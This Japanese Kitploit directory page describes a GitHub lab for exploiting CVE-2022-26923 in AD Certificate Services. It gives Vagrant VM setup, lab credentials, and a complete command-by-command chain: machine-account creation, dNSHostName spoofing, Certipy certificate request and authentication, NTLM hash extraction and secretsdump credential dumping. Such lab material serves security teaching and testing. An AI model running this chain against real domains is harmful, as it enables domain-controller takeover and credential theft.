Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-26923-rayng — CVE-2022-26923 のエクスプロイト | Kitploit
ツール/GitHubGitHub/rayngnpc/cve-2022-26923-rayng
パスワードクラッキング特権昇格脆弱性分析エクスプロイトペネトレーションテスト認証学習と教育ラボと実践
GitHubrayngnpc/cve-2022-26923-rayng

CVE-2022-26923-rayng

CVE-2022-26923 のエクスプロイト

リポジトリを見る
41年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-26923 の悪用: 証明機関の権限昇格

概要

CVE-2022-26923 は、Active Directory 証明書サービス (AD CS) の脆弱性で、攻撃者が証明書ベースの認証を悪用して権限を昇格できるようにします。このガイドでは、Impacket と Certipy を使用してこの脆弱性を悪用する手順を説明します。


資格情報テーブル

仮想マシンユーザー名パスワード
Windows ServerAdministrator!@windowsadmintest101
Windows Servertestuser$Vulnerable139
Kali-Linux VMvagrantvagrant

手順 1: リポジトリのクローンと仮想マシンのセットアップ

まず、必要なファイルを含むリポジトリをクローンします:

root@kitploit:~
git clone https://github.com/rayngnpc/CVE-2022-26923-rayng.git
cd CVE-2022-26923-rayng

仮想マシンのセットアップ

リポジトリには 2 つのフォルダがあり、それぞれに仮想マシンをプロビジョニングするための Vagrantfile が含まれています。先にホストマシンに Vagrant をインストールする必要があります。

Vagrant のインストール

Windows の場合

こちら から Vagrant をダウンロードしてインストールします。 または PowerShell を使用してインストール:

root@kitploit:~
choco install vagrant
Linux の場合
root@kitploit:~
sudo apt update && sudo apt install vagrant -y

Windows Server 2022 VM

WindowsServer2022 ディレクトリに移動します:

root@kitploit:~
cd WindowsServer2022
vagrant up

これにより、Windows Server 2022 VM が VirtualBox にダウンロードされてセットアップされます。

Kali Linux VM

Kali-LinuxVM ディレクトリに移動します:

root@kitploit:~
cd Kali-LinuxVM
vagrant up

手順 2: 仮想ネットワークの設定

悪用には NAT ネットワークが必要なため、VirtualBox を次のように構成します:

Windows の場合

以下のコマンドを実行する前に、VBoxManage が環境変数に追加されていることを確認してください。そうでない場合は、フルパスでコマンドを実行します:

NAT ネットワークの追加

root@kitploit:~
VBoxManage natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable

VBoxManage が認識されない場合は、次を使用します:

root@kitploit:~
"C:\Program Files\Oracle\VirtualBox\VBoxManage.exe" natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable

Linux の場合

root@kitploit:~
VBoxManage natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable

両方の VM が VirtualBox で確認され、ネットワークアダプター NatNetwork - NatNet1 に割り当てられていることを確認します。

異なる名前で NAT ネットワークを作成することもできますが、IP 範囲は 10.0.2.0/24 である必要があります。


手順 3: hosts ファイルの修正

先に、Windows Server 2022 と Kali Linux VM の両方が起動していることを確認します。

Kali Linux VM にアクセスして攻撃を開始します。

/etc/hosts ファイルを更新してドメインコントローラーの IP をマッピングします:

root@kitploit:~
sudo nano /etc/hosts

次のエントリを追加します:

root@kitploit:~
10.0.2.121 SERVER2022.pchau.domain.local SERVER2022 pchau-SERVER2022-CA pchau.domain.local

保存して終了します。


手順 4: 環境のセットアップ

CVE-26923 ディレクトリに移動し、Python 仮想環境をアクティブにします:

root@kitploit:~
cd ~/CVE-26923
source ~/CVE-26923/rayng/bin/activate

手順 5: ドメインへのコンピュータの追加

Impacket の addcomputer ユーティリティを使用:

root@kitploit:~
impacket-addcomputer -computer-name 'PCTEST1' -computer-pass 'testuser' -dc-host 10.0.2.121 -domain-netbios pchau.domain.local pchau.domain.local/testuser:'$Vulnerable139'

手順 6: PCTEST1 をドメインコントローラーに割り当て

方法 1: SSH を使用 (対象サーバーに OpenSSH がインストールされている場合)

root@kitploit:~
ssh [email protected]
Get-ADComputer PCTEST1 -properties dnshostname,serviceprincipalname
Set-ADComputer PCTEST1 -DnsHostName SERVER2022.pchau.domain.local
Get-ADComputer PCTEST1 -properties dnshostname,serviceprincipalname

方法 2: SSH を使用しない場合 (Impacket と BloodyAD を使用)

ドメインのコンピュータを確認:

root@kitploit:~
impacket-GetADComputers pchau.domain.local/testuser:'$Vulnerable139' -dc-ip 10.0.2.121

bloodyAD ディレクトリに移動し、bloodyAD.py を使用して PCTEST1 をドメインに追加:

root@kitploit:~
cd ~/CVE-26923/bloodyAD/
python3 bloodyAD.py -d pchau.domain.local -u testuser -p '$Vulnerable139' --host 10.0.2.121 set object PCTEST1$ dNSHostName -v 'SERVER2022.pchau.domain.local'

PCTEST1 がドメインに割り当てられたことを確認:

root@kitploit:~
impacket-GetADComputers pchau.domain.local/testuser:'$Vulnerable139' -dc-ip 10.0.2.121

手順 7: 悪用プロセス

脆弱な証明書の検出

Certipy を使用して脆弱な証明書を検出:

root@kitploit:~
certipy find -dc-ip 10.0.2.121 -username 'PCTEST1$' -password 'testuser'

証明書の要求

Certipy を使用してマシン証明書を要求:

root@kitploit:~
certipy req -dc-ip 10.0.2.121 -username 'PCTEST1$' -password 'testuser' -template Machine -ca pchau-SERVER2022-CA

証明書を使用した認証

取得した証明書を使用して認証:

root@kitploit:~
certipy auth -pfx server2022.pfx

手順 8: NTLM ハッシュの抽出

certipy auth コマンドを実行すると、2 つのハッシュが表示されます。NTLM 認証には右側のハッシュが使用されます。

ハッシュ出力例:

root@kitploit:~
aad3b435b51404eeaad3b435b51404ee:69079fd4946af567d682d61e121f29e7

抽出した NTLM ハッシュを使用して資格情報をダンプ:

root@kitploit:~
impacket-secretsdump '[email protected]' -hashes :69079fd4946af567d682d61e121f29e7

これで CVE-2022-26923 を悪用するための完全な攻撃チェーンが完了します。

ツールをダウンロード